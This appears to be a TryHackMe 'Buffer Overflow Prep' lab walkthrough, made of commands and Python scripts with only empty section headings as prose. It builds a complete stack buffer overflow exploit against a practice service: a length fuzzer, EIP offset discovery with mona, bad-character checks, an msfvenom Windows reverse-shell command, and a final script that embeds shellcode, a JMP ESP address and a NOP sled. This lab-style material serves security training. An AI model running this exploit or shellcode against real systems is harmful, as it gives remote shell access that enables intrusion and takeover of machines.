What is Buffer Overflow? — TryHackMe: Buffer Overflow Prep Walkthrough

Introduction

Buffer Overflow Definition

What is Buffer Overflow?

What is a Buffer Overflow Attack?

xfreerdp /u:admin /p:password /cert:ignore /v:10.x.x.x /smart-sizing
nc 10.x.x.x 1337

Mona Configuration

!mona config -set workingfolder c:\mona\%p

Fuzzing

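#!/usr/bin/env python3
"""Length fuzzer for the OVERFLOW1 command of the practice service.

Each round sends the command prefix followed by a run of "A"s that grows by
100 bytes per round, and reports the length at which the service stops
answering. The walkthrough then builds a 2400-byte cyclic pattern, presumably
sized a little above the length reported here.
"""
import socket
import sys
import time

ip = "10.x.x.x"
port = 1337
timeout = 5             # seconds to wait for a reply before the service is treated as crashed
prefix = "OVERFLOW1 "
string = prefix + "A" * 100   # the printed byte count excludes the prefix

while True:
    try:
        # One fresh connection per round, so the reply (or its absence) belongs
        # to the length sent in this round only.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect((ip, port))
            # Consume whatever the service sends on connect. If it sends nothing,
            # this recv times out and is reported as a crash at the current length.
            s.recv(1024)
            print(f"Fuzzing with {len(string) - len(prefix)} bytes")
            s.send(bytes(string, "latin-1"))
            # No reply within `timeout` (or a reset connection) is the crash signal.
            s.recv(1024)
    except OSError:
        # socket.timeout, ConnectionRefusedError/ConnectionResetError and
        # name-resolution errors are all OSError subclasses, so everything that
        # means "the service did not respond" is still caught. The original bare
        # `except:` also swallowed KeyboardInterrupt and reported Ctrl-C as a
        # crash at the current length.
        # NOTE(review): a failure in the very first round (wrong ip/port, service
        # not running) is indistinguishable from a crash at 100 bytes; confirm
        # the first round connects before trusting the reported length.
        print(f"Fuzzing crashed at {len(string) - len(prefix)} bytes")
        sys.exit(0)
    string += 100 * "A"
    time.sleep(1)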

Crash Replication & Controlling EIP

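#!/usr/bin/env python3
"""Exploit skeleton used to replicate the crash and locate the EIP offset.

Every field except `prefix` is empty or zero here. The walkthrough next runs
`pattern_create.rb -l 2400` (its output presumably goes into `payload`),
sends the buffer with this script and reads the offset back with
`!mona findmsp -distance 2400`, which reports 1978 for OVERFLOW1.
"""
import socket

ip = "10.10.2.120"
port = 1337
prefix = "OVERFLOW1 "   # command prefix; the overflow data follows it in the buffer
offset = 0              # bytes before the saved return address; 0 until findmsp reports it
overflow = "A" * offset
retn = ""               # 4-byte return-address overwrite, filled in a later step
padding = ""            # NOP sled, added in the "Prepending NOPs" step
payload = ""            # cyclic pattern in this step, shellcode in the final exploit
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix

# `with` closes the socket on every path (the original never closed it), and
# OSError covers connection refused/reset and name-resolution failures, so a
# Ctrl-C or a bug in the script is no longer reported as "Could not connect.".
try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((ip, port))
        print("Sending evil buffer...")
        # latin-1 maps code points 0-255 one-to-one onto bytes, so "\x.." strings
        # in the fields above reach the wire unchanged.
        s.send(bytes(buffer + "\r\n", "latin-1"))
        print("Done!")
except OSError:
    print("Could not connect.")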
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400
python3 exploit.py
!mona findmsp -distance 2400
EIP contains normal pattern : ... (offset 1978)

Finding Bad Characters

!mona bytearray -b "\x00"
#!/usr/bin/env python3
# Emit "\x01" through "\xff" as a single line of escape sequences, ready to be
# pasted into the exploit template's payload field for the bad-character
# comparison (`!mona compare`). The range starts at 1 to match the `-b "\x00"`
# exclusion in the `!mona bytearray` command above. Output ends with one newline.
print("".join(f"\\x{value:02x}" for value in range(1, 256)))
!mona compare -f C:\mona\oscp\bytearray.bin -a 0188FA30

Finding a Jump Point

!mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"

Generating Payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=443 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f c

Prepending NOPs

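#!/usr/bin/env python3
"""Final OVERFLOW1 exploit: filler, return-address overwrite, NOP sled, shellcode.

Buffer layout, with every value taken from the earlier steps of the walkthrough:
  prefix   - the "OVERFLOW1 " command
  overflow - 1978 filler bytes, the EIP offset reported by `!mona findmsp`
  retn     - the 4 bytes that land on the saved return address (EIP)
  padding  - 16 NOPs (0x90) placed ahead of the shellcode ("Prepending NOPs")
  payload  - msfvenom windows/shell_reverse_tcp output, encoded with
             -b "\\x00\\x07\\x08\\x2e\\x2f\\xa0\\xa1" so none of the bad
             characters found with `!mona compare` appear in it
"""
import socket

ip = "10.x.x.x"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978                   # from `EIP contains normal pattern : ... (offset 1978)`
overflow = "A" * offset
# NOTE(review): presumably the little-endian form of a JMP ESP address returned
# by `!mona jmp -r esp` (0x625011af); the mona output is not shown, confirm it.
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
# Generated by the msfvenom command in "Generating Payload"; the bytes are tied to
# the LHOST/LPORT used there and must be regenerated for any other listener.
payload = ("\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
           "\xac\x9e\x69\x95\x83\xee\xfc\xe2\xf4\x50\x76\xeb\x95\xac\x9e"
           "\x09\x1c\x49\xaf\xa9\xf1\x27\xce\x59\x1e\xfe\x92\xe2\xc7\xb8"
           "\x15\x1b\xbd\xa3\x29\x23\xb3\x9d\x61\xc5\xa9\xcd\xe2\x6b\xb9"
           "\x8c\x5f\xa6\x98\xad\x59\x8b\x67\xfe\xc9\xe2\xc7\xbc\x15\x23"
           "\xa9\x27\xd2\x78\xed\x4f\xd6\x68\x44\xfd\x15\x30\xb5\xad\x4d"
           "\xe2\xdc\xb4\x7d\x53\xdc\x27\xaa\xe2\x94\x7a\xaf\x96\x39\x6d"
           "\x51\x64\x94\x6b\xa6\x89\xe0\x5a\x9d\x14\x6d\x97\xe3\x4d\xe0"
           "\x48\xc6\xe2\xcd\x88\x9f\xba\xf3\x27\x92\x22\x1e\xf4\x82\x68"
           "\x46\x27\x9a\xe2\x94\x7c\x17\x2d\xb1\x88\xc5\x32\xf4\xf5\xc4"
           "\x38\x6a\x4c\xc1\x36\xcf\x27\x8c\x82\x18\xf1\xf6\x5a\xa7\xac"
           "\x9e\x01\xe2\xdf\xac\x36\xc1\xc4\xd2\x1e\xb3\xab\x61\xbc\x2d"
           "\x3c\x9f\x69\x95\x85\x5a\x3d\xc5\xc4\xb7\xe9\xfe\xac\x61\xbc"
           "\xc5\xfc\xce\x39\xd5\xfc\xde\x39\xfd\x46\x91\xb6\x75\x53\x4b"
           "\xfe\xff\xa9\xf6\x63\x91\xbf\xa8\x01\x97\xac\x9f\xd2\x1c\x4a"
           "\xf4\x79\xc3\xfb\xf6\xf0\x30\xd8\xff\x96\x40\x29\x5e\x1d\x99"
           "\x53\xd0\x61\xe0\x40\xf6\x99\x20\x0e\xc8\x96\x40\xc4\xfd\x04"
           "\xf1\xac\x17\x8a\xc2\xfb\xc9\x58\x63\xc6\x8c\x30\xc3\x4e\x63"
           "\x0f\x52\xe8\xba\x55\x94\xad\x13\x2d\xb1\xbc\x58\x69\xd1\xf8"
           "\xce\x3f\xc3\xfa\xd8\x3f\xdb\xfa\xc8\x3a\xc3\xc4\xe7\xa5\xaa"
           "\x2a\x61\xbc\x1c\x4c\xd0\x3f\xd3\x53\xae\x01\x9d\x2b\x83\x09"
           "\x6a\x79\x25\x89\x88\x86\x94\x01\x33\x39\x23\xf4\x6a\x79\xa2"
           "\x6f\xe9\xa6\x1e\x92\x75\xd9\x9b\xd2\xd2\xbf\xec\x06\xff\xac"
           "\xcd\x96\x40")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix

# `with` closes the socket on every path (the original never closed it), and
# OSError covers connection refused/reset and name-resolution failures, so a
# Ctrl-C or a bug in the script is no longer reported as "Could not connect.".
try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((ip, port))
        print("Sending evil buffer...")
        # latin-1 maps code points 0-255 one-to-one onto bytes, so retn, the
        # NOPs and the shellcode reach the wire exactly as written above.
        s.send(bytes(buffer + "\r\n", "latin-1"))
        print("Done!")
except OSError:
    print("Could not connect.")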

Exploit

References
